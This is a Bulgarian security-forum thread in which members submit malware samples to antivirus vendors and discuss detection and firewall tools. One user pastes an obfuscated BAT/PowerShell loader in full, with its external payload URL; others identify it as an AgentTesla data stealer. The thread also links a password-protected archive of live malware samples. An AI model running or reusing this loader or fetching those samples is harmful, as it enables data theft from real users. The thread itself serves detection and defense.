Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции, откриване на нови заплахи - част 18

Featured Replies

преди 2 часа, B-boy/StyLe/ написа:

По-добре виж с notepad какво точно прави BAT файла за да знаеш какви поражения да търсиш евентуално и дали можеш да ги обърнеш (ревърсниш).

 

Ето го кода:

Цитат

@echo off
set djksjd=PBOBWBEBRBSBHBEBLBL

set djksjd=%djksjd:B=%
Set bwe0d=$rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType
set bwe0d2=], 3072);[System.Net.ServicePointManager]::SecurityProto
set bwe0d3=col = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thParti
set bwe0d4=alName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
set bwe0d5=$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tt
set bwe0d6=y;$rot='Down','load','str','ing';$rotJ=($rot -join '');$bnt='ht','tps://agios.ro/M9.t','xt';$bng0=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::Call
set bwe0d7=Byname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bng0);z($mv)

 

start /min %djksjd% %bwe0d%%bwe0d2%%bwe0d3%%bwe0d4%%bwe0d5%%bwe0d6%%bwe0d7%

 

 

Иначе като го пуснах (без админ права), се появи син прозорец и пишеше нещо "false" с жълти букви и след 2-3 секунди прозореца се затваря.

  • Отговори 8,9k
  • Прегледи 625k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

  • Каква ползва от него тогава, като мълчи като риба? Само за красота и да товари системата ли?

  • При мен пък на тестовата машина с Windows XP SP3 и MS NetFreamwork 4 не иска да се стартира. Явно и вирусите спират поддръжката на XP 

  • Този е за пращане : http://dox.bg/files/dw?a=9f58b3c1f9 https://www.virustotal.com/bg/file/2ee50fd5c9f67e8814142de2009ec4234ee19dec1d4e9189ac5f45c359ed20eb/analysis/1482744276/    

Публикувани изображения

Нали не забравяте за поливариантно стартиращи буби?  Проверявайте по всякакви начини.

току-що, *S197* написа:

Какви други начини?

Каквото се сетиш -  хипс, сонар,  репутация,  сандбокс,  стена, евристика   и т. н.  

преди 3 минути, attj написа:

Каквото се сетиш -  хипс, сонар,  репутация,  сандбокс,  стена, евристика   и т. н.  

Към Касперски, с какво друго предлагаш да сканирам?

преди 2 минути, *S197* написа:

Към Касперски, с какво друго предлагаш да сканирам?

Платените версии си ги имат повечето от тези неща.   Дали са настроени правилно е друг въпрос.   И не е само до сканирания.  Провери стартирания, активни процеси, отворени портове и въобще всичко за каквото се сетиш.     

преди 1 час, *S197* написа:

Ето го кода:

 

Иначе като го пуснах (без админ права), се появи син прозорец и пишеше нещо "false" с жълти букви и след 2-3 секунди прозореца се затваря.

Крадец на данни е това. Не е деструктивен в смисъл на щети по ОС, но е деструктивен за финансовите постъпления.

Посетения сайт до вчера не е бил засичан, но вече е от интересно само една програма:

Цитат

This DOMAIN is used by AGENTTESLA. AgentTesla is spyware designed in .Net to steal personal data, capture screenshots, and record clipboard and form values. It's marketed on its own website, falsely claimed to be a legitimate keylogger. Popular in the hacker community for its ease of use and tech support, it likely originated in Turkey.

https://www.virustotal.com/gui/url/09da27e87a95a5361c0b818bda41e0e4220fd4e05078f57e984de6c86b73ec4d?nocache=1

Тук има подобен код:

https://mdaemon.com/community/forums/topic/122450/virus-not-detected-by-both-ikarus-and-clam

Сайта в този код се засича доста повече, защото е на повече от седмица:

https://www.virustotal.com/gui/url/2369926bb9df564ce69cba81008db61b9daefb708775f6a50cabef7b5028a560?nocache=1

 

преди 20 часа, B-boy/StyLe/ написа:

Какво бе Тошко? С кое не си съгласен?

По-скоро загрижен.   Някои антивируси влизат в пълно сканиране при среща и при несправяне с поливариантно стартиращи буби.   Да ти изключат защитата си е неповторима емоция.    Тогава влизаш в лично ръчно съприкосновение, което пък е върха на мармалада.   За мен е удоволствие,  а например такива като  леля Станка изпадат  в нервна криза.   Защото пак и били блокирали лаптопа.   

преди 19 минути, attj написа:

За мен е удоволствие,  а например такива като  леля Станка изпадат  в нервна криза.   Защото пак и били блокирали лаптопа.   

Ами не я тормози така жената тогава де. :)

преди 2 часа, B-boy/StyLe/ написа:

Ами не я тормози така жената тогава де. :)

Не съм го бил преинсталирал правилно.  Тя е с 10 годишен лаптоп с Уин 8.1 и е със стената на Комодо.   Май вече 4-5 тодини.  Стената задава въпроси и лелята понякога греши в отговорите.  После все  други са виновни.  Сама се блокира.     Не иска друга защита,  уж заради автосандбокса.   Пак съм и изключил хипса. 

преди 20 часа, B-boy/StyLe/ написа:

Крадец на данни е това. Не е деструктивен в смисъл на щети по ОС, но е деструктивен за финансовите постъпления.

Посетения сайт до вчера не е бил засичан, но вече е от интересно само една програма:

https://www.virustotal.com/gui/url/09da27e87a95a5361c0b818bda41e0e4220fd4e05078f57e984de6c86b73ec4d?nocache=1

Тук има подобен код:

https://mdaemon.com/community/forums/topic/122450/virus-not-detected-by-both-ikarus-and-clam

Сайта в този код се засича доста повече, защото е на повече от седмица:

https://www.virustotal.com/gui/url/2369926bb9df564ce69cba81008db61b9daefb708775f6a50cabef7b5028a560?nocache=1

 

Я тука не държим финанси. Доверил съм се на iPhone-a.

преди 20 часа, B-boy/StyLe/ написа:

https://mdaemon.com/community/forums/topic/122450/virus-not-detected-by-both-ikarus-and-clam

Сайта в този код се засича доста повече, защото е на повече от седмица:

https://www.virustotal.com/gui/url/2369926bb9df564ce69cba81008db61b9daefb708775f6a50cabef7b5028a560?nocache=1

 

Касперки също го засича, въпреки, че не е отбелязан във VT.

1.JPG

преди 1 минута, *S197* написа:

Касперки също го засича, въпреки, че не е отбелязан във VT.

Може, защото аз им ги пратих и двата. Пратих ги и на Netcraft, но те ми върнаха, че са чисти, което не е вярно.

https://report.netcraft.com/submission/hkjQB9CxTxgDX0yLUbO0LqIdAYm1wy3A?tab=urls

https://report.netcraft.com/submission/EYbf4tP6omi6TZQEjp119ILK4FaNQPXm?tab=urls

Между другото и портала на Касперски го даде чист:

https://opentip.kaspersky.com/http%3A%2F%2Fantuofermo.it%2F/?tab=web

Но те така или иначе са със статус 404 и вече ги няма май. Или ти говориш за BAT файла, не за сайтовете в него?

преди 39 минути, Лудият Учен написа:

https://www.upload.ee/files/16358745/Malware.rar.html

5 зловредни файла...Password : infected

Дефендерчо арестува архива без да ми иска парола.   Да не би да я е запомнил? Гледам в хронологията -само две е класифицирал с дефиниции.  Обаче арестува и другите три.

преди 8 минути, attj написа:

Обаче арестува и другите три.

Не знам,Тоше... Озадачен съм...Ти,по-добре знаеш...

преди 43 минути, Лудият Учен написа:

Не знам,Тоше... Озадачен съм...Ти,по-добре знаеш...

Дефендерчо започна да се презастрахова като Кихчо.   Не зная дали да ги похваля.  Изглежда се учат един от друг.   Китаецът ми позволява файлчетата  да ги възстановявам, а американецът не дава.   Няма ги в хронологията, изтрил ги е автоматично.     

преди 16 часа, B-boy/StyLe/ написа:

 Или ти говориш за BAT файла, не за сайтовете в него?

Да, за bat файла говорех. Но така или иначе, вече го хваща. Писах за него в темата за Касперски, вчера.

преди 1 час, *S197* написа:

Да, за bat файла говорех. Но така или иначе, вече го хваща. Писах за него в темата за Касперски, вчера.

Все пак не подценявай подобни изходящи заявки. Стената обади ли се при стартиране на bat файла (когато файла не се засичаше)?

Без значение дали стената на Win или ако ползваш тази на Kaspersky? Между другото ти не беше ли с платен Kaspersky? Ако да, тогава защо не си активираш Application Manager модула като при @nikssi?

Тогава и без дефиниции ще бъде отрязан достъпа на подобни зловредни файлове, както видя в снимките на @nikssi. Използвай възможностите за които си си платил. А и това е най-силния компонент на платената версия като цяло. Аз ако си го купя един ден, ще е точно заради него. :)

преди 55 минути, B-boy/StyLe/ написа:

Все пак не подценявай подобни изходящи заявки. Стената обади ли се при стартиране на bat файла (когато файла не се засичаше)?

Без значение дали стената на Win или ако ползваш тази на Kaspersky? Между другото ти не беше ли с платен Kaspersky? Ако да, тогава защо не си активираш Application Manager модула като при @nikssi?

Тогава и без дефиниции ще бъде отрязан достъпа на подобни зловредни файлове, както видя в снимките на @nikssi. Използвай възможностите за които си си платил. А и това е най-силния компонент на платената версия като цяло. Аз ако си го купя един ден, ще е точно заради него. :)

Свърши ми лиценза и сега съм на безплатната версия. Стената на Windows не се е обаждала. Скоро време, на заплата, ще взема 1 или двугодишен лиценз. Гледам, имат и промоции от 40-60% , зависи от изданието.

PS: Сега съм пуснал MBAM, който вече четири часа и половина ми сканира диска. :D Верно, изчел е над половин милион файлове, ама Касперски за около час и нещо ги сканира.

 

 

Untitled.jpg

преди 43 минути, *S197* написа:

Свърши ми лиценза и сега съм на безплатната версия. Стената на Windows не се е обаждала. Скоро време, на заплата, ще взема 1 или двугодишен лиценз. Гледам, имат и промоции от 40-60% , зависи от изданието.

PS: Сега съм пуснал MBAM, който вече четири часа и половина ми сканира диска. :D Верно, изчел е над половин милион файлове, ама Касперски за около час и нещо ги сканира.

Тогава не е зле да си добавиш един Windows Firewall Control. Хем без пари, хем по-добър контрол над стената, хем Malwarebytes я купиха и ще си е в комплект с другия скенер на Malwarebytes.

Тази програма прави вградената стена доста по-добра (нещо подобно на DefenderUI и Configure_Defender за Windows Defender-a).

А иначе е нормално Malwarebytes да сканира по-бавно (особено ако е пусната опцията за проверки на рууткити). Тази опция не е добра да е включена за цялостна проверка, а само за бързата такава.

Отделно Malwarebytes не проверява файлове, които не са изпълними и не е добра в хващането на скриптови атаки (каквито са и bat файловете между другото).

Аз бих пуснал ESET Online Scanner-a след Kaspersky за такъв тип проверки.

Но като цяло не е добре да тестваш на работна машина, колкото и да имаш доверие в защитата си.

преди 20 минути, B-boy/StyLe/ написа:

Тогава не е зле да си добавиш един Windows Firewall Control. Хем без пари, хем по-добър контрол над стената, хем Malwarebytes я купиха и ще си е в комплект с другия скенер на Malwarebytes.

Тази програма прави вградената стена доста по-добра (нещо подобно на DefenderUI и Configure_Defender за Windows Defender-a).

А иначе е нормално Malwarebytes да сканира по-бавно (особено ако е пусната опцията за проверки на рууткити). Тази опция не е добра да е включена за цялостна проверка, а само за бързата такава.

Отделно Malwarebytes не проверява файлове, които не са изпълними и не е добра в хващането на скриптови атаки (каквито са и bat файловете между другото).

Аз бих пуснал ESET Online Scanner-a след Kaspersky за такъв тип проверки.

Но като цяло не е добре да тестваш на работна машина, колкото и да имаш доверие в защитата си.

Мерси за съветите. Сложих стената и сега ще пусна скенера на есет.

Защитникът на Микрософт със стената на Комодо също  е доста интересна комбинация с много възможности.  Последните дни се чудя защо антивирусът така се престарава -  трие всичко съмнително превантивно. Пречи ми да стартирам буби на реална ОС.  Стената на варанчо с всичко включено и настроено,  може и сама да се защитава,  обаче няма опция за изключване на Дефендерчо.  Сам се включва при липса на активен антивирус.   

Регистрирайте се или влезете в профила си за да коментирате

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.